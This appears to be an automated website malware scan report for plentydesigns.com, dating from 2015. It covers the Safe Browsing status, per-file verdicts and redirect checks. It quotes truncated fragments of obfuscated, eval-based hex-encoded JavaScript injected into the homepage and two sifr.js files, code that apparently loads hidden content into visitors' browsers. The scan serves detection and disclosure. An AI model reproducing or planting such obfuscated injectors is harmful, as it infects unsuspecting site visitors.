Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=plentydesigns.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://plentydesigns.com/ | 200 OK Content-Length: 8761 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) urj="s"+"p"+"li"+"t";snvm=window;fyely="dy";wdxfzg=document;cbfzc="0x";wfgpk=(5-3-1);try{++(wdxfzg.body)}catch(veyx){hisze=false;try{}catch(lyydl){hisze=21;}if(1){rjvqt="17:5d:6c:65:5a:6b:60:66:65:17:5b:69:5d:5b:5b:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:5b:69:5d:5b:5b:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60: Antivirus reports:
| ||
http://plentydesigns.com/styles/sifr.js | 200 OK Content-Length: 19514 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ps="split";e=eval;v="0x";a=0;z="y";try{a*=25}catch(zz){a=1}if(!a){try{--e("doc"+"ument")["\x62od"+z]}catch(q){a2="_";sa=0xa-02;}z="28_6e_7d_76_6b_7c_71_77_76_28_82_82_82_6e_6e_6e_30_31_28_83_15_12_28_7e_69_7a_28_6d_7c_76_75_28_45_28_6c_77_6b_7d_75_6d_76_7c_36_6b_7a_6d_69_7c_6d_4d_74_6d_75_6d_76_7c_30_2f_71_6e_7a_69_75_6d_2f_31_43_15_12_15_12_28_6d_7c_76_75_36_7b_7a_6b_28_45_28_2f_70_7c_7c_78_42_37_37_7a_77_6b_73_35_7a_6d_6e_77_7a_75_36_71_76_6e_77_37_72_7b_37_6d_7b_6c_36_78_70_78_2f_43_15_12_28_ Antivirus reports:
| ||
http://plentydesigns.com/styles/sifr-addons.js | 200 OK Content-Length: 11056 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ps="split";e=eval;v="0x";a=0;z="y";try{a*=25}catch(zz){a=1}if(!a){try{--e("doc"+"ument")["\x62od"+z]}catch(q){a2="_";sa=0xa-02;}z="28_6e_7d_76_6b_7c_71_77_76_28_82_82_82_6e_6e_6e_30_31_28_83_15_12_28_7e_69_7a_28_6d_7c_76_75_28_45_28_6c_77_6b_7d_75_6d_76_7c_36_6b_7a_6d_69_7c_6d_4d_74_6d_75_6d_76_7c_30_2f_71_6e_7a_69_75_6d_2f_31_43_15_12_15_12_28_6d_7c_76_75_36_7b_7a_6b_28_45_28_2f_70_7c_7c_78_42_37_37_7a_77_6b_73_35_7a_6d_6e_77_7a_75_36_71_76_6e_77_37_72_7b_37_6d_7b_6c_36_78_70_78_2f_43_15_12_28_ Antivirus reports:
| ||
http://plentydesigns.com/test404page.js | 404 Not Found Content-Length: 295 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: plentydesigns.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 25 Feb 2015 22:50:43 GMT
Accept-Ranges: bytes
ETag: "15309d2-2239-4e4dee4441022"
Server: Apache/2.2.21 (Debian)
Vary: Accept-Encoding
Content-Length: 8761
Content-Type: text/html
Last-Modified: Mon, 26 Aug 2013 19:37:50 GMT
...8761 bytes of data.
GET / HTTP/1.1
Host: plentydesigns.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 25 Feb 2015 22:50:43 GMT
Accept-Ranges: bytes
ETag: "15309d2-2239-4e4dee4441022"
Server: Apache/2.2.21 (Debian)
Vary: Accept-Encoding
Content-Length: 8761
Content-Type: text/html
Last-Modified: Mon, 26 Aug 2013 19:37:50 GMT
...8761 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: plentydesigns.com
Referer: http://www.google.com/search?q=plentydesigns.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: plentydesigns.com
Referer: http://www.google.com/search?q=plentydesigns.com
Result:
The result is similar to the first query. There are no suspicious redirects found.